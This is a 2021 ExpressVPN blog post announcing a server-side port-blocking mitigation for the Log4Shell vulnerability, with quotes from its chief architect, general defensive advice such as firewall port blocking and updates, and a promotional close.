This post was originally published on December 14, 2021.
ExpressVPN has identified and rolled out a protective layer for the Log4j vulnerability known as Log4Shell. All ExpressVPN users now benefit from this protection—all it takes is turning on the VPN.
The critical zero-day vulnerability (CVE-2021-44228) has been wreaking havoc across the internet, in a scenario that Wired has called “a full-blown security meltdown.” A live exploit has already been demonstrated in Minecraft—and an extensive list of services and companies has been identified as vulnerable, including Apple’s iCloud, Steam, Amazon, Tesla, and Twitter.
This new layer of protection was implemented at 09:30 GMT, December 14, 2021, and is live across all ExpressVPN VPN servers worldwide. This means that everyone using ExpressVPN on their devices or router enjoys protection from the Apache Log4j vulnerability. This mitigation is server-side, so no action from users is required.
Peter Membrey, Chief Architect, ExpressVPN, says: “While this vulnerability has not affected us directly and the security of our company systems is intact, we were not content to sit and watch this impact the world. Many of the apps and services our customers rely on are being affected. Given that LDAP is a networking protocol, we saw an opportunity for us as a VPN to provide an essential layer of protection against this vulnerability.
“Furthermore, while the focus on the risks posed by Log4Shell have been mostly focused on server infrastructure, the fact is that Log4j is also used in many client applications as well, and consumers are vulnerable.
“We identified Log4Shell as an LDAP- and Java RMI-reliant vulnerability, so there were two potential paths for overcoming it: port-based blocking and packet-based blocking. We implemented the port-based blocking solution immediately as it was the fastest solution to bring to market, and responding at speed was crucial to minimize the impact of this vulnerability globally. However, we will continue to work on the packet-based approach and plan to roll it out as soon as it is ready and we are confident we can do it client-side with no negative privacy impacts.”
Log4j vulnerability protection, not a fix
“To be clear, this is not a silver bullet, but it will make a significant impact on protecting internet users,” says Membrey. “The nature of this vulnerability means that just being cybersecurity-savvy won’t protect you from it—especially if you use platforms that allow chat, like Minecraft, or other gaming or social platforms.”
Additional measures to protect yourself
Aside from turning on your VPN for all internet connections, internet users are recommended to:
- Update your firewall settings to block outbound traffic on non-standard ports that you wouldn’t typically use, particularly on those known to be used by Log4Shell (RMI – 1099, LDAP – 389, 636, 1389, 3268, 3269, or other).
- Turn on auto-updates for your applications or update them manually if a security patch is made available.
- Continue checking as additional solutions and mitigations are identified, as the security community’s understanding of this vulnerability and its exploits is evolving. We’ll keep updating this blog post with our recommendations as we learn more.
What ExpressVPN is doing internally to counter this threat
We have proactively verified that our codebase is either sufficiently patched or not vulnerable. Separately, we’ve taken additional steps and measures to push extended security measures across our network appliances and employee workstations to prevent the vulnerability from working. We are actively monitoring the situation and leveraging threat intelligence sources to proactively monitor our estate for signs of intrusions as a result of this vulnerability and are keeping a close eye on all newly discovered software and hardware that might be impacted by this.
Log4Shell has been given a severity rating of 10.0 out of 10.0 and been called “the bug that’s breaking the internet.”
Key to its significance is the fact that it affects Log4j, which is ubiquitous in internet infrastructure. As a result, it seems that virtually every major service using Java, as well as many apps, is vulnerable in some way.
Furthermore, Log4Shell attacks can be executed easily without the victim clicking any link, pressing any key, or otherwise taking any action. For example, the exploit demonstrated in the popular game Minecraft simply required the malicious actor to input a message into a chat box to gain access to Minecraft’s servers.
With each passing day, more and more apps and services will be at risk of being exploited, including many that our customers are using. The massive scale of this vulnerability only underlines how important it is to find an effective fix quickly.
Take the first step to protect yourself online
30-day money-back guarantee